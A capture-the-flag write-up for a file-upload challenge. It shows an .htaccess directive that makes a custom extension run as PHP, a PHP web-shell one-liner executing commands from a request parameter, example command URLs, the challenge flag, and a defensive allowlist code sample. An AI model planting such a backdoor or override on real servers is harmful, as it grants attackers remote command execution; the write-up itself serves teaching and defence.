Flash CTF – Open Application

Challenge Objective

The goal of this challenge is to exploit a file upload vulnerability to obtain the flag hosted on the server.

What is .htaccess?

.htaccess is a configuration file used by the Apache HTTP Server software. It allows for directory-level configuration changes, including URL rewriting, access control, and MIME type settings. In this challenge, we’ll use .htaccess to override the default handling of file extensions and enable execution of PHP code.

Proof of Concept (PoC)

In this challenge, PHP extensions are filtered, but .htaccess files are not. By uploading a .htaccess file, we can configure the server to execute files with custom extensions as PHP.

Exploit Strategy

Uploading .htaccess

Create an .htaccess file with the following content to map a custom file extension to PHP:

AddType application/x-httpd-php .lol

This configuration tells the server to treat files with the .lol extension as PHP scripts.

Uploading a Simple PHP One-Liner

Save the following PHP code as rce.lol. This script will serve as a simple backdoor allowing remote command execution:

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

By accessing the rce.lol file on the server, you can execute commands. For example: uploads/rce.lol?cmd=cat+../flag.txt

This URL executes the cat ../flag.txt command on the server and displays the contents of the flag file.

Execution

Once the .htaccess and rce.lol files are uploaded, you can execute commands on the server using the rce.lol script by passing the desired command as a query parameter. This method allows you to interact with the server and potentially access sensitive files or data.
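The root cause above is an extension denylist that never considers .htaccess or unknown extensions. The following added example (not the challenge's code) contrasts that check with an allowlist and server-generated storage names. The function names, extension lists and sample file names are assumptions made for illustration.

```php
<?php
// Added example: names, lists and sample inputs are assumptions.

// Weak check, modelled on the write-up: reject known PHP extensions only.
function denylist_accepts(string $name): bool
{
    $blocked = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, $blocked, true);
}

// Hardened check: a conservative base name with no dots, followed by exactly
// one extension from a short allowlist. Dotfiles such as .htaccess and
// double extensions such as a.php.png can never match the pattern.
function allowlist_accepts(string $name): bool
{
    $allowed = ['png', 'jpg', 'jpeg', 'gif', 'pdf'];
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), $allowed, true);
}

// Store under a server-generated name so the client never controls the
// on-disk file name; returns null when the upload must be refused.
function stored_name(string $name): ?string
{
    if (!allowlist_accepts($name)) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the two file names from the write-up.
foreach (['photo.png', '.htaccess', 'rce.lol', 'shell.php', 'a.php.png'] as $n) {
    printf("%-10s denylist=%-6s allowlist=%-6s stored=%s\n",
        $n,
        denylist_accepts($n) ? 'accept' : 'reject',
        allowlist_accepts($n) ? 'accept' : 'reject',
        stored_name($n) ?? '-');
}
```

Independently of the filename check, setting AllowOverride None for the upload directory in the main Apache configuration stops Apache from reading an uploaded .htaccess at all.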

Flag

MetaCTF{g1v3s_m3_acce5s_4lr1ght}